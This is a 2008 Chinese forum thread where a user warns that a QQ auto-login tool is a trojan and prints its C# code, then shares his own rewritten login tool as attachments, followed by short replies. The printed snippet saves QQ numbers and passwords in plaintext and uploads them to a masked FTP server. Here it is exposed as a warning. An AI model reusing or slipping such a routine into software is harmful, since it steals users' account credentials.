| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 7536 人关注过本帖, 4 人收藏
标题:★★QQ自动登录器〓+〓C#源码★★
只看楼主 加入收藏
苍琅
Rank: 1
等 级:新手上路
帖 子:116
专家分:0
注 册:2006-12-11
收藏(4)
 问题点数:0 回复次数:21 
★★QQ自动登录器〓+〓C#源码★★
一直帮朋友挂QQ,最近突然很厌倦反复的输入N个号码,在输入N次密码。所以才找到了已经出现很久的QQ自动登录器。担心中马,木马杀客,卡巴,360一起扫描,没有异常,第二天就发现有密码被改了。。。
最后在网上找到了1份程序代码,恰好是出自一人之手。
发现如下代码:
StreamWriter sw = new StreamWriter(System.Environment.SystemDirectory + "\\" + QQNumber + ".SGP", false, System.Text.Encoding.GetEncoding("GB2312"));                  
sw.WriteLine("QQNumber:" + QQNumber + "\r\nQQPassword:" + tbQQPass.Text);                  
sw.Close();                  
System.Threading.Thread th = new System.Threading.Thread(new System.Threading.ThreadStart(PutFile));                  
th.Start();

private void PutFile()
{
   initClient initclient=new initClient();
   Client=initclient.GetDefaultClient();
   Client.Connect();
   Client.Put(System.Environment.SystemDirectory+"\\"+QQNumber+".SGP");
   Client.DisConnect();
   File.Delete(System.Environment.SystemDirectory+"\\"+QQNumber+".SGP");
}
class initClient
{
    QQMLogin.FTPClient Client=new QQMLogin.FTPClient();
    public initClient()
    {
        Client.RemoteHost="*.*.*.*";
        Client.RemotePass="*";
        Client.RemotePath="*";
        Client.RemotePort=21;
        Client.RemoteUser="*";
    }
    public QQMLogin.FTPClient GetDefaultClient()
    {
        return this.Client;
    }
}
明文记录QQ号码及密码,然后发送到指定的ftp,达到盗取号码的目的!!!

庆幸自己还有密保,那回了号码。
最后搜了好几种QQ自动登录器,进行了整合修改,作出这个小东西。大家放心使用,顺便贴出源码学习下(很简单,入门级学习吧)。大家有好的想法,可以尽情修改完善,只希望代码公开。搞个小小开源~

最后,感谢源程序的作者提供盗号程序下载,感谢这次盗号,感谢无私贡献源码。。。

新手注意:没装.NET Framework 不能正常运行!

[[it] 本帖最后由 苍琅 于 2008-2-26 21:56 编辑 [/it]]

QQ自动登录器.rar (77.71 KB)


QQloginCode.part1.rar (200.11 KB)


QQloginCode.part2.rar (200.11 KB)


QQloginCode.part3.rar (15.28 KB)
搜索更多相关主题的帖子: 源码 自动 登录 
2008-02-26 17:27
YSKING
Rank: 5Rank: 5
来 自:中国绿城
等 级:贵宾
威 望:16
帖 子:1380
专家分:25
注 册:2006-11-11
收藏
得分:0 
好,支持一下[bc01]

仍然自由自我,永远高唱我歌,走遍千里...
2008-02-26 18:00
苍琅
Rank: 1
等 级:新手上路
帖 子:116
专家分:0
注 册:2006-12-11
收藏
得分:0 

没人气,打击~

现实的残酷并不能磨灭我们对生活的渴望! " target="_blank">http://canglangjv.
2008-02-27 11:10
我要笑
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-2-27
收藏
得分:0 
^_^,可以用么
楼主用的怎么样啊,效果好不?
2008-02-27 11:53
我要笑
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-2-27
收藏
得分:0 
8哭
偶不是顶了么?
2008-02-27 11:54
jalonlovesja
Rank: 5Rank: 5
来 自:湖南邵阳
等 级:职业侠客
帖 子:292
专家分:371
注 册:2008-2-19
收藏
得分:0 
不知道是真的还是假的啊??不过也顶一下
2008-02-27 18:31
hoddog
Rank: 1
来 自:福建泉州
等 级:新手上路
帖 子:33
专家分:0
注 册:2008-2-18
收藏
得分:0 
不错,我顶
不错,我顶,收藏.
2008-02-27 22:52
lizhenzhi
Rank: 1
等 级:新手上路
帖 子:35
专家分:0
注 册:2008-2-17
收藏
得分:0 
2008-02-28 10:32
xusleep
Rank: 1
等 级:新手上路
帖 子:1
专家分:0
注 册:2008-6-12
收藏
得分:0 
2008-06-12 10:24
青格儿
Rank: 4
等 级:贵宾
威 望:11
帖 子:698
专家分:20
注 册:2007-7-31
收藏
得分:0 
呵呵,我也来顶一下
2008-06-12 17:22
快速回复:★★QQ自动登录器〓+〓C#源码★★
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.017502 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved